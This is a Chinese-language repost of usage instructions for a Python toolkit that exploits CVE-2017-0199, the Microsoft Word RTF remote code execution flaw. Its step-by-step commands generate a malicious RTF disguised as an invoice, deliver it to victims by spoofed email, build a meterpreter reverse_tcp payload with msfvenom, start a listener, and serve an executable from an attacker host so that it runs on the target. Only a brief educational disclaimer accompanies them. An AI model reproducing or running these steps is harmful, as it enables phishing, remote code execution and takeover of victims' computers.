项目地址

https://github.com/bhdresh/CVE-2017-0199

CVE-2017-0199 – v2.0

CVE-2017-0199 – v2.0是一个比较方便测试CVE-2017-0199的python脚本,它提供了一种快速有效的方式来利用Microsoft RTF RCE。它可以生成恶意的RTF文件,并将metasploit/meterpreter有效载荷发送给受害者,而不需要任何复杂的配置。

版本:Python版本2.7.13 

- Generate Malicious RTF file using toolkit - Run toolkit in an exploitation mode as tiny HTA + Web server

视频教程

https://youtu.be/42LjG7bAvpg

用法:

工具包含以下功能 

- Automatically send generated malicious RTF to victim using email spoofing

例:

  • 步骤1:使用以下命令生成恶意RTF文件,并将其发送给受害者 
     Syntax: # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta> Example: # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
  • 步骤2(可选,如果使用MSF的有效载荷):生成metasploit payload并启动监听程序 
     Example: Generate Payload: # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe Start Handler: # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
  • 步骤3:在开发模式下启动工具包生成payload 
     Syntax: # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe> Example: # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

命令行参数: 

# python cve-2017-0199_toolkit.py -h This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE) Modes: -M gen                                         Generate Malicious RTF file only

     Generate malicious RTF file:     -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).     -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.                                             For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and                                             will be requested once victim will open malicious RTF file. -M exp                                         Start exploitation mode

     Exploitation:     -p <TCP port:Default 80>           Local port number.     -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.     -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

免责声明

这个程序只适用于教育目的。未经许可不得使用。适用通常的免责声明,特别是对于由直接或间接使用这些程序提供的功能造成后果,概不负责。

 

*转自MottoIN